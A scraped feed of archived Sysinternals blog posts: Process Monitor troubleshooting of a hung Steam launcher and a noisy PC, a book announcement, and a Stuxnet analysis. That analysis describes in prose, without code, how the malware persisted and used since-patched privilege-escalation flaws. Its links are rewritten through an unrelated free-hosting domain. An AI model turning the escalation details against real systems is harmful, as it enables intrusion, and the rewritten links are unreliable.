my favorites over the last few years was the puzzle game, <A href="#" target="_blank"> Portal </A> . I enjoyed the first Portal so much that I pre-ordered <A href="#" target="_blank"> Portal 2 </A> on Valve’s <A href="#" target="_blank"> Steam </A> network when it became available and played through it within a few hours of its release. Since then, I’ve been playing community-developed maps. Last Saturday I started a particularly fun map, a winner from a <A href="#" target="_blank"> community map contest </A> , but didn’t have time to finish it in one sitting. The next morning I returned to my PC, double-clicked on the Portal 2 desktop icon, and got the standard Steam launch dialog. The game normally launches in a couple of seconds, but this time the dialog just sat there: </P> <P> <IMG alt="image" border="0" height="148" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/2287.image_5F00_thumb.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121351i1E417358CE2C1559" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="324" /> </P> <P> I killed Steam and double-clicked again, but again the dialog hung. I captured a Process Monitor trace and looked at the stacks of Steam’s threads in Process Explorer, but didn’t see any clues. Figuring that perhaps Portal 2’s configuration or installation had somehow been corrupted, I deleted Portal 2, re-downloaded it, and reinstalled it. That didn’t fix the problem, though. With Portal 2 reset to a clean state, that left either Steam or some general Windows issue to blame. The next step was therefore to reinstall Steam. </P> <P> I first went to the Uninstall or Change a Program page in the Control Panel, but double-clicking on the Steam entry brought up a dialog asking me to confirm uninstalling it and warning that doing so would delete all local content.&nbsp; I didn’t want to risk losing my game settings or have to reinstall all my games, so I aborted the uninstall. Most Microsoft Installer Service (MSI)-based installers have a repair option that reinstalls the application without deleting user data or configuration, so I went to the Steam home page, downloaded and executed the Steam installer. Sure enough, the install wizard offered the repair option: </P> <P> <IMG alt="image" border="0" height="274" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/6404.image_5F00_thumb_5F00_1.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121352i311429C7D080DA47" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="354" /> </P> <P> When I pressed the Next button, though, I was greeted with an obviously misleading error message that reported a network error while trying to read from a local file: </P> <P> <IMG alt="image" border="0" height="269" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/3364.image_5F00_thumb_5F00_2.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121353i4ECB6595BD7A67D6" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="354" /> </P> <P> I turned to <A href="#" target="_blank"> Process Monitor </A> again and captured a trace of the failed repair operation. The error message referred to a file named SteamInstall[1].msi, so I searched the log file for that string. The first hit was the data value read in a query of a registry value under HKCR\Installer\Products named PackageName: </P> <P> <IMG alt="image" border="0" height="52" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/4857.image_5F00_thumb_5F00_3.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121354i4D1D10E6662C94A4" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> The next hits, a few operations later, were attempts by the installer to read from the file location printed in the error dialog: </P> <P> <IMG alt="image" border="0" height="43" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/7870.image_5F00_thumb_5F00_4.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121355iD05A4FC471B27D3B" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> That the installer was reading the file name from an existing registry key and the file’s location was in Internet Explorer’s (IE’s) download cache suggested that it was trying to launch the copy of itself that had performed the initial install. Because I had originally launched the installer via IE directly from the Valve web site, just like I was doing now, the download location was in IE’s download cache, but the file must have aged out and been deleted since then. </P> <P> The Process Monitor trace revealed that the installer was reading the original location from the registry, so if I pointed the registry at the installer’s new download location, I could trick it into launching itself, rather than looking for the previous copy that was now missing. I scanned the log for the new download location by searching for Steaminstall.msi and found its path, another download cache location: </P> <P> <IMG alt="image" border="0" height="50" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/8463.image_5F00_thumb_5F00_6.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121356i9D67FB1034B775E1" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> I then went back to the registry query’s entry, right-clicked on it, and selected “Jump To” from the context menu. That caused Process Monitor to launch Regedit and navigate directly to the registry key, where I updated the LastUsedSource and PackageName values to reflect the new download location: </P> <P> <IMG alt="image" border="0" height="61" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/1614.image_5F00_thumb_5F00_5.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121357i0FB0FEFE15E12487" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="404" /> </P> <P> Next, I dismissed the installer’s error dialog, which I had left open, and pressed the wizard’s Next button to try the repair again. This time, Steam proceeded to reinstall and the wizard concluded with a message of success: </P> <P> <IMG alt="image" border="0" height="140" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/0131.image_5F00_thumb_5F00_7.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121358iE66DC0E43A8564D2" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="354" /> </P> <P> Crossing my fingers, I launched Portal 2. Steams’s ‘Preparing to Launch’ dialog flashed for a second and then Portal 2’s splash screen took over the screen: case closed.&nbsp; Uninstalling and then reinstalling Steam and all the games would have likely lead to the same conclusion, but Process Monitor had surely saved me a lot of time and possibly even my saved game state and configurations. In just a few minutes I was back to solving puzzles of a different kind. </P> <P> Check out the new <A href="#" target="_blank"> Windows Sysinternals Administrator’s Reference </A> by me and Aaron Margosis for more tips on using all 70+ Sysinternals tools to troubleshoot and manage your Windows systems! Buy a copy by August 15, email the receipt to me at <A href="https://gorovian.000webhostapp.com/?exam=mailto:markruss@ntdev.microsoft.com" target="_blank"> markruss@ntdev.microsoft.com </A> and I’ll enter you for a drawing of one of 10 signed copies of <A href="#" target="_blank"> Zero Day </A> I’m giving away. </P> <P> <EM> Mark Russinovich is a Technical Fellow on the Windows Azure team at Microsoft and is author of <A href="#" target="_blank"> Windows Internals </A> , <A href="#" target="_blank"> The Windows Sysinternals Administrator’s Reference </A> , and the cyberthriller <A href="#" target="_blank"> Zero Day: A Novel </A> . You can contact him at </EM> <A href="https://gorovian.000webhostapp.com/?exam=mailto:markruss@ntdev.microsoft.com" target="_blank"> <EM> markruss@ntdev.microsoft.com </EM> </A> <EM> . </EM> </P> </BODY></HTML> Thu, 27 Jun 2019 07:19:42 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-case-of-the-hung-game-launcher/ba-p/724089 MarkRussinovich 2019-06-27T07:19:42Z Troubleshooting with the New Sysinternals Administrator’s Reference https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/troubleshooting-with-the-new-sysinternals-administrator-8217-s/ba-p/724079 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on Jul 03, 2011 </STRONG> <BR /> <IMG align="right" alt="image" border="0" height="187" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/5700.image_5F00_thumb.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121348i4C5FA30CEB19496F" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; margin-left: 0px; border-left-width: 0px; margin-right: 0px" title="image" width="154" /> <P> <A href="#" target="_blank"> Aaron Margosis </A> and I are thrilled to announce that the long awaited, and some say long overdue, official guide to the <A href="#" target="_blank"> Sysinternals tools is now available </A> ! I’ve always had the idea of writing a book on the tools in the back of my mind, but it wasn’t until a couple of years ago that <A href="#" target="_blank"> Dave Solomon </A> , my coauthor on <A href="#" target="_blank"> <EM> Windows Internals </EM> </A> , convinced me to pursue it. After a few false starts, I decided that a coauthor would help get the book done more quickly, and turned to Aaron, a good friend of mine who’s also a long-time user and expert on the tools at his day job in the Federal Division of Microsoft Consulting Services. It was a great choice and I’m proud to put the Sysinternals brand on the book. </P> <P> Whether you’re new to the tools or have been using them since Bryce Cogswell (my Sysinternals and Winternals Software cofounder, now retired) and I released NTFSDOS in 1996, you’re sure to take away new insights that will give you the edge when tackling tough problems and managing your Windows systems. </P> <P> The book covers all 70+ tools, with chapters dedicated to the major tools like <A href="#" target="_blank"> Process Explorer </A> , <A href="#" target="_blank"> Process Monitor </A> , and <A href="#" target="_blank"> Autoruns </A> . For each we provide a thorough tour of all of the tool’s features, how to use the tool, and include our favorite tips and techniques. There’s no better way to learn than by example, though.&nbsp; The last section of the book will be familiar to anyone that’s read this blog or watched my <A href="#" target="_blank"> Case of the Unexplained </A> conference sessions, because it presents 17 real-world cases that show how Windows power users and administrators like you solved otherwise impossible-to-solve problems by using the tools. </P> <P> The book is available for purchase on <A href="#" target="_blank"> Amazon.com </A> and available from O'Reilly in <A href="#" target="_blank"> 4 ebook formats </A> , or you can read it online through <A href="#" target="_blank"> Safari </A> . </P> <P> The eBook has only been out for a couple of weeks and we’ve already heard from someone who bought the book and immediately used what he learned to solve a case that was literally ruining his sleep. I thought it only appropriate to include it here in the blog post announcing the book. </P> <P> Let us know what you think of the book by dropping us an email, and as I say my dedication to you - my fellow Windows troubleshooters - at the front of the book, <A href="#" target="_blank"> never give up, never surrender! </A> </P> <H3> The Case of the Mysterious Sounds </H3> <P> The case opened several weeks ago when a user started hearing sounds from the computer in his bedroom. The sound, a simple short tone, came randomly, sometimes only once per day, other times a few times in an hour. Every time he heard it, he’d jump to the computer, open Process Explorer, and look for clues as to what might be responsible, but the sounds persisted even when he had no applications open. On a few occasions he was woken from sleep and learned to mute the speaker before heading to bed. His life began to unravel from his lack of sleep and growing frustration. Work suffered, he was short with his friends, and he started to wonder if he had a ghost. </P> <P> Then last week he saw the announcement that the Sysinternals book was available. He had been a casual user of the tools and thought that getting a deeper understanding might help his IT management responsibilities at work. When he reached the chapter on Process Monitor, he read that many years ago Dave Solomon found Process Monitor so useful at uncovering root causes to such a wide array of problems, that he coined the phrase “when in doubt, run Process Monitor.” With little to lose, he decided to give the advice a try on his haunted home system. </P> <P> He configured a filter for files ending in .WAV, hypothesizing that the sound was stored in that common format. Since he didn’t know how long it would take for a sound to reoccur, he needed to leave Process Monitor running for many hours. So that it wouldn’t exhaust the system’s virtual memory or fill up the disk, he used its “drop filtered events” feature to only record events matching the active filter. He left Process Monitor running and went to work. When he arrived home, he eagerly went to the computer to see if the culprit had been caught. Almost collapsing with relief, he saw eight operations had matched the filter: </P> <P> <IMG alt="image" border="0" height="213" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/3817.image_5F00_thumb_5F00_3.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121349i5EA06B3F152D5391" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> The tooltip clearly revealed that the wireless adapter’s applet had played a sound. Then it all clicked: the computer was just in range of the wireless base station, so while it had a decent connection most of the time, occasionally the connection would drop. He suspected that the applet chimed to announce when the connection was restored. Expecting that it would offer an option to disable the notification, he right-clicked on the tray icon. Sure enough, “Enable Internet Connected Notification” was checked: </P> <P> <IMG alt="image" border="0" height="121" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/3733.image_5F00_thumb_5F00_4.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121350iF926ED17AE6BAC0C" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="373" /> </P> <P> Since he unchecked it, the computer hasn’t made any unexpected noises and the case was closed. As a result, his sleep has returned to normal, he’s getting along with his friends, and his use of what he’s learned from the Sysinternals Administrator’s Reference has made him a star at work. </P> <P> <EM> Mark Russinovich is a Technical Fellow on the Windows Azure team at Microsoft and is author of <A href="#" target="_blank"> Windows Internals </A> , <A href="#" target="_blank"> The Windows Sysinternals Administrator’s Reference </A> , and the cyberthriller <A href="#" target="_blank"> Zero Day: A Novel </A> . You can contact him at </EM> <A href="https://gorovian.000webhostapp.com/?exam=mailto:markruss@ntdev.microsoft.com" target="_blank"> <EM> markruss@ntdev.microsoft.com </EM> </A> <EM> . </EM> </P> </BODY></HTML> Thu, 27 Jun 2019 07:18:41 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/troubleshooting-with-the-new-sysinternals-administrator-8217-s/ba-p/724079 MarkRussinovich 2019-06-27T07:18:41Z The Zero Day Book Trailer https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-zero-day-book-trailer/ba-p/724075 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on May 03, 2011 </STRONG> <BR /> <P> I just got back the finished version of the video trailer for my new cyber thriller <A href="#" target="_blank"> Zero Day </A> , which I think came out awesome! It’s not hard to imagine what a Zero Day movie trailer would look like. Let me know what you think. </P> <DIV class="wlWriterEditableSmartContent" id="scid:5737277B-5D6D-4f48-ABFC-DD9C333F4C5D:9d6054fb-9e77-4f59-947e-b9454afe9a5b" style="padding-bottom: 0px; margin: 0px; padding-left: 0px; padding-right: 0px; display: inline; float: none; padding-top: 0px"> <DIV id="c9bae1f3-6b6e-4109-8ecf-7a520af80af0" style="margin: 0px; padding: 0px; display: inline;"> <DIV> <IMG alt="" galleryimg="no" onload="var downlevelDiv = document.getElementById('c9bae1f3-6b6e-4109-8ecf-7a520af80af0'); downlevelDiv.innerHTML = &quot;&lt;div&gt;&lt;object width=\&quot;448\&quot; height=\&quot;252\&quot;&gt;&lt;param name=\&quot;movie\&quot; value=\&quot;https://www.youtube.com/v/ucyMBYg9RWU?hl=en&amp;hd=1\&quot;&gt;&lt;\/param&gt;&lt;embed src=\&quot;https://www.youtube.com/v/ucyMBYg9RWU?hl=en&amp;hd=1\&quot; type=\&quot;application/x-shockwave-flash\&quot; width=\&quot;448\&quot; height=\&quot;252\&quot;&gt;&lt;\/embed&gt;&lt;\/object&gt;&lt;\/div&gt;&quot;;" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/3757.videod487c20efd10_5F00_61C04581.jpg" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121347iF1DF90E54D9D761D" style="border-style: none" /> </DIV> </DIV> <DIV style="width:448px;clear:both;font-size:.8em"> Zero Day Book Trailer </DIV> </DIV> </BODY></HTML> Thu, 27 Jun 2019 07:18:17 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-zero-day-book-trailer/ba-p/724075 MarkRussinovich 2019-06-27T07:18:17Z Analyzing a Stuxnet Infection with the Sysinternals Tools, Part 3 https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/analyzing-a-stuxnet-infection-with-the-sysinternals-tools-part-3/ba-p/724073 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on Apr 17, 2011 </STRONG> <BR /> <P> In the <A href="#" target="_blank"> first post of this series </A> , I used <A href="#" target="_blank"> Autoruns </A> , <A href="#" target="_blank"> Process Explorer </A> and <A href="#" target="_blank"> VMMap </A> to statically analyze a Stuxnet infection on Windows XP. That phase of the investigation revealed that Stuxnet infected multiple processes, launched infected processes that appeared to be running system executables, and installed and loaded two device drivers. In <A href="#" target="_blank"> the second phase </A> , I turned to the <A href="#" target="_blank"> Process Monitor </A> trace I had captured during the infection and learned that Stuxnet had launched several additional processes during the infection. The trace also uncovered the fact that Stuxnet had dropped four files with the .PNF extension into the C:\Windows\Inf directory. In this concluding post, I use the Sysinternals tools to try to determine the purpose of the PNF files and to look at how Stuxnet used a zero-day vulnerability on Windows 7 (since fixed) to elevate itself to run with administrator rights. </P> <H4> The .PNF Files </H4> <P> My first step in gathering clues about the .PNF files was to just see how large they were. Tiny files would probably be data and larger ones code. The four .PNF files in question are the following, listed with the sizes in bytes I observed in Explorer: </P> <TABLE border="0" cellpadding="2" cellspacing="0" width="209"> <TBODY> <TR> <TD valign="top" width="118"> MDMERIC3.PNF </TD> <TD valign="top" width="89"> 90 </TD> </TR> <TR> <TD valign="top" width="118"> MDMCPQ3.PNF </TD> <TD valign="top" width="89"> 4,943 </TD> </TR> <TR> <TD valign="top" width="118"> OEM7A.PNF </TD> <TD valign="top" width="89"> 498,176 </TD> </TR> <TR> <TD valign="top" width="118"> OEM6C.PNF </TD> <TD valign="top" width="89"> 323,848 </TD> </TR> </TBODY> </TABLE> <P> I also dumped the printable characters contained within the files using the <A href="#" target="_blank"> Sysinternals Strings </A> utility, but saw no legible words. That wasn’t surprising, however, because I expected the files to be compressed or encrypted. </P> <P> I thought that by looking at the way Stuxnet references the .PNF files, I might find additional clues regarding their purpose. To get a more complete view of their usage, I captured a Process Monitor boot log of the system rebooting after the infection. Boot logging, which you configure by selecting Enable Boot Logging in the Options menu, has Process Monitor capture activity from very early in the next boot and stop capturing either when you run Process Monitor again, or when the system shuts down: </P> <P> <IMG alt="image_thumb4" border="0" height="221" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/5280.image_5F00_thumb4_5F00_thumb_5F00_6560C1AA.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121336i4F358CD3A8DD009A" style="background-image: none; border-right-width: 0px; margin: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image_thumb4" width="201" /> </P> <P> After capturing a boot log that included me logging back into the system, I loaded the boot log into one Process Monitor window and the initial infection trace into a second Process Monitor window. Then I reset the filters in both traces, removed the advanced filter that excludes System process activity, and added an inclusion filter for Mdmeric3.pnf to see all activity directed at the first file. The infection trace had the events related to the initial creation of the file and nothing more, and the file wasn’t referenced at all in the boot log. It appeared that Stuxnet didn’t leverage the file during the initial infection or in its subsequent activation. The file’s small size, 90 bytes, implies that it is data, but I couldn’t determine its purpose based on the little evidence I saw in the logs. In fact, the file may serve no useful purpose since none of the published Stuxnet reports have anything further to say about the file other than that it’s a data file. </P> <P> Next, I repeated the same filtering exercise for Mdmcpq3.pnf. In the infection log, I had seen the Services.exe process write the file’s contents three times during the initial infection, but there were no accesses afterward. In the boot trace, I could see Services.exe read the file immediately after starting: </P> <P> <IMG alt="image_thumb11" border="0" height="54" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/5706.image_5F00_thumb11_5F00_thumb_5F00_12E1E16E.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121337iE056FA90BD747B4B" style="background-image: none; border-right-width: 0px; margin: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image_thumb11" width="554" /> </P> <P> The fact that Stuxnet writes the file during the infection and reads it once when it activates during a system boot, coupled with the file’s relatively small size, hints that it might be Stuxnet configuration data, and that’s what formal analysis by antivirus researchers has concluded. </P> <P> The third file, Oem7a.pnf, is the largest of the files. I saw during my analysis of the infection log in the last post that after the rogue Lsass.exe writes the file during the infection, one of the other rogue Lsass.exe instances reads it in its entirety, as does the infected Services.exe process. An examination of the boot log showed that Services.exe reads the entire file when it starts: </P> <P> <IMG alt="image" border="0" height="147" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/8802.image_5F00_thumb_5F00_0A0CCF65.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121338iF1A7BEDA690C1E2B" style="background-image: none; border-right-width: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="468" /> </P> <P> What’s unusual is that the read operations are the very first performed by Services.exe, even before the Ntdll.dll system DLL loads. Ntdll.dll loads before any user-mode code executes, so seeing activity before then can only mean that kernel-mode code is responsible. The stack shows that they are actually initiated by Mrxcls.sys, one of the Stuxnet drivers, from kernel mode: </P> <P> <IMG alt="image_thumb3" border="0" height="246" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/2465.image_5F00_thumb3_5F00_thumb_5F00_1275AE79.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121339i7EBCA384464D6816" style="background-image: none; border-right-width: 0px; margin: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image_thumb3" width="254" /> </P> <P> The stack shows that Mrxcls.sys is invoked by the PsCallImageNotifyRoutines kernel function. That means Mrxcls.sys called <A href="#" target="_blank"> PsSetLoadImageNotifyRoutine </A> so that Windows would call it whenever an executable image, such as a DLL or device driver, is mapped into memory. Here, Windows was notifying the driver that the Services.exe image file was loading into memory to start the Services.exe process. Stuxnet clearly registers with the callback so that it can watch for the launch of Services.exe. Ironically, Process Monitor also uses this callback functionality to monitor image loads. </P> <P> These observations point at Mrxcls.sys as the driver that triggers the infection of user-mode processes when the system boots after the infection. Further, the size of the file, 498,176 bytes (487 KB), almost exactly matches the size of the virtual memory region, 488 KB, from where we saw Stuxnet operations initiate in Part 1 of the investigation. That region held an actual DLL, so it appears that Oem7a.pnf is the encrypted on-disk form of the main Stuxnet DLL, a hypothesis that’s confirmed by antimalware researchers. </P> <P> The final file, Oem6c.pnf, is not referenced at all in the boot trace. The only accesses in the infection trace are writes from the initial Lsass.exe process that also writes the other files. Thus, this file is written during the initial infection, but apparently never read. There are several potential explanations for this behavior. One is that the file might be read under specific circumstances that I haven’t reproduced in my test environment. Another is that it is a log file that records information about the infection for collection and review by Stuxnet developers at a later point. It’s not possible to tell from the traces, but antimalware researchers believe that it is a log file. </P> <H4> Windows 7 Elevation of Privilege </H4> <P> Many of the operations performed by Stuxnet, including the infection of system processes like Services.exe and the installation of device drivers, require administrative rights. If Stuxnet failed to infect systems with users lacking those rights, its ability to spread would have been severely hampered, especially into the sensitive networks it seems to have been targeting where most users likely run with standard user rights. To gain administrative rights from standard-user accounts, Stuxnet took advantage of two zero-day vulnerabilities. </P> <P> On Windows XP and Windows 2000, Stuxnet used an index checking bug in Win32k.sys that could be triggered by loading specially-crafted keyboard layout files(fixed in <A href="#" target="_blank"> MS10-073 </A> ). The bug allowed Stuxnet to inject code into kernel-mode and run with kernel privileges. On Windows Vista and newer, Stuxnet used a flaw in the access protection of scheduled task files that enabled it to give itself administrative rights (fixed in <A href="#" target="_blank"> MS10-92 </A> ). Standard users can create scheduled tasks, but those tasks should only be able to run with the same privileges as the user that created them. Before the bug was fixed, Windows would create the file storing a task with permissions that allowed standard users to modify the file. Stuxnet took advantage of the hole by creating a new task, setting the flag in the resulting task file that specifies that the task should run in the System account, which has full administrative rights, and then launching the task. </P> <P> To watch Stuxnet exploiting the Windows 7 bug, I started by uninstalling the related patch on a test system and monitored a Stuxnet infection with Process Monitor. After capturing the trace, I followed the same steps I described in the last post of setting a filter that discarded all operations except those that modify files and registry keys (“Category Is Write”), and then methodically excluding unrelated events. When I was finished the Process Monitor window looked like this: </P> <P> <IMG alt="image" border="0" height="269" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/7612.image_5F00_thumb_5F00_60724987.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121340i36D5062E10153E27" style="background-image: none; border-right-width: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="554" /> </P> <P> The first events are Stuxnet dropping the temporary files that it later copies to PNF files in the C:\Windows\Inf directory. Those are followed by Svchost.exe events that are clearly related to the Task Scheduler service. The Scvhost.exe process creates a new scheduled task file in C:\Windows\System32\Tasks and then sets some related registry values. Stack traces of the events show that Schedsvc.dll, the DLL that implements the Task Scheduler service, is responsible: </P> <P> <IMG alt="image" border="0" height="299" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/5141.image_5F00_thumb_5F00_74F79905.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121341i5A3EA2B3335261A0" style="background-image: none; border-right-width: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="554" /> </P> <P> A few operations later, Explorer writes some data to the new task file: </P> <P> <IMG alt="image" border="0" height="92" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/2425.image_5F00_thumb_5F00_18B0C0A0.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121342i3FBA656E1824187C" style="background-image: none; border-right-width: 0px; margin: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="554" /> </P> <P> This is the operation that shouldn’t be possible, since a standard user account should not be able to manipulate a system file. We saw in the last post that the &lt;unknown&gt; frames in the stack of the operation show that Stuxnet is at work: </P> <P> <IMG alt="image" border="0" height="321" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/4174.image_5F00_thumb_5F00_385F9A68.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121343iFC9C0D8ABFD25C18" style="background-image: none; border-right-width: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="304" /> </P> <P> The final operations in the trace associated with the task file are those of the Task Scheduler deleting the file, so Stuxnet apparently modifies the task, launches it, and then deletes it: </P> <P> <IMG alt="image" border="0" height="57" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/1263.image_5F00_thumb_5F00_6CFFF6A3.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121344i3E70B9F602399F8B" style="background-image: none; border-right-width: 0px; margin: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="554" /> </P> <P> To verify that the Task Scheduler in fact launches the task, I removed the write filter and applied another filter that included only references to the task file. That made an event appear in the display that shows Svchost.exe read the file after Stuxnet wrote to the file: </P> <P> <IMG alt="image" border="0" height="59" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/8204.image_5F00_thumb_5F00_5EC17DB3.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121345i1F214F974BBB6A47" style="background-image: none; border-right-width: 0px; margin: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="554" /> </P> <P> As a final confirmation, I looked at the operation’s stack and saw the Task Scheduler service’s SchRpcEnableTask function, whose name implies that it’s related to task activation: </P> <P> <IMG alt="image" border="0" height="186" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/1854.image_5F00_thumb_5F00_7E70577B.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121346i7756CD4C5808A8EC" style="background-image: none; border-right-width: 0px; margin: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="327" /> </P> <H4> Stuxnet Revealed by the Sysinternals Tools </H4> <P> In this concluding segment of my Stuxnet investigation, I was able to use Process Monitor’s boot logging feature to gather clues pointing to the purpose of the various files Stuxnet drops on a system at the time of infection. Process Monitor also revealed the method by which Stuxnet used a flaw in the Task Scheduler service on Windows 7 to give itself administrative rights. </P> <P> This blog post series shows how the Sysinternals tools can provide an overview of malware infection and subsequent operation, as well as present a guide for cleaning an infection. They showed many of the key aspects of Stuxnet’s behavior with relative ease, including the launching of processes, dropping of files, installation of device drivers and elevation of privilege via the task scheduler. As I pointed out at the beginning of Part 1, a professional security researcher’s job would be far from done at this point, but the view given by the tools provides an accurate sketch of Stuxnet’s operation and a framework for further analysis. Static analysis alone would make gaining this level of comprehension virtually impossible, certainly within the half hour or so it took me using the Sysinternals tools. </P> <P> <EM> Mark Russinovich is a Technical Fellow on the Windows Azure team at Microsoft and is author of <A href="#" target="_blank"> Windows Internals </A> , <A href="#" target="_blank"> The Windows Sysinternals Administrator’s Reference </A> , and the cyberthriller <A href="#" target="_blank"> Zero Day: A Novel </A> . You can contact him at </EM> <A href="https://gorovian.000webhostapp.com/?exam=mailto:markruss@ntdev.microsoft.com" target="_blank"> <EM> 